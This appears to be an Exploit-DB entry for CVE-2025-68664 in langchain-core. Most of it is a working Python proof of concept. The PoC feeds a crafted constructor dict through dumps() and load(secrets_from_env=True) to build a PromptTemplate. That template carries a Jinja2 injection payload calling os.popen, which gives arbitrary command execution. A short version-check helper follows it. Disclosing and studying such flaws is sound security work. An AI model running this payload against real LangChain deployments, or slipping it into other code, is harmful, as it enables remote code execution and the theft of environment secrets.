LangChain Core 1.2.4 - SSTI/RCE

EDB-ID: 52514
Author: banyamer
Type: webapps
Platform: Multiple
Date: 2026-04-29


# Exploit Title: LangChain Core - SSTI/RCE 
# Date: 2025-12-29
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Contact: @banyamer_security (Instagram)
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.langchain.com/
# Software Link: https://pypi.org/project/langchain-core/
# Version: < 0.3.81 and < 1.2.5
# Tested on: Python 3.10 - 3.12
# CVE : CVE-2025-68664
# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
#              with the Jinja2 template format, leading to Server-Side Template Injection (SSTI) and
#              arbitrary command execution (RCE).

import os
from langchain_core.load import dumps, load
from langchain_core.prompts import PromptTemplate

# Dummy env var: not used by the payload itself, but it illustrates that
# secrets_from_env=True lets deserialized objects pull secrets from the environment
os.environ["TEST_SECRET"] = "secret_value_123"

# Malicious constructor payload targeting PromptTemplate with SSTI
payload = {
    "exploit": {
        "lc": 1,
        "type": "constructor",
        "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
        "kwargs": {
            "input_variables": [],
            # Classic Jinja2 escape: the built-in `cycler` global exposes its
            # module's globals, which include `os` (the original `config`-based
            # payload fails because `config` is undefined in the render context)
            "template": "{{ cycler.__init__.__globals__.os.popen('id').read() }}",
            "template_format": "jinja2"
        }
    }
}

# Serialize: dumps() does not escape the 'lc'/'type' marker keys, so the
# attacker-controlled dict round-trips as a constructor instruction
serialized = dumps(payload)

# Deserialize - instantiates the malicious PromptTemplate
deserialized = load(serialized, secrets_from_env=True)

# Extract and invoke the malicious prompt → triggers SSTI → RCE
malicious = deserialized["exploit"]
output = malicious.format()

print("[*] Command execution output:")
print(output)
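
Before running the PoC, it can help to confirm the installed langchain-core version actually falls below the patched thresholds listed above (0.3.81 on the 0.3.x line, 1.2.5 on the 1.x line). The sketch below is illustrative: the `is_vulnerable` helper is an assumption of this write-up, parses only the first three numeric components, and does not handle pre-release suffixes.

```python
from importlib import metadata

def is_vulnerable(version: str) -> bool:
    """Rough check against the patched thresholds (0.3.81 / 1.2.5).

    Illustrative only: ignores pre-release/dev suffixes.
    """
    parts = tuple(int(p) for p in version.split(".")[:3])
    if parts[0] == 0:
        return parts < (0, 3, 81)
    return parts < (1, 2, 5)

try:
    installed = metadata.version("langchain-core")
    state = "VULNERABLE" if is_vulnerable(installed) else "patched"
    print(f"langchain-core {installed}: {state}")
except metadata.PackageNotFoundError:
    print("langchain-core is not installed")
```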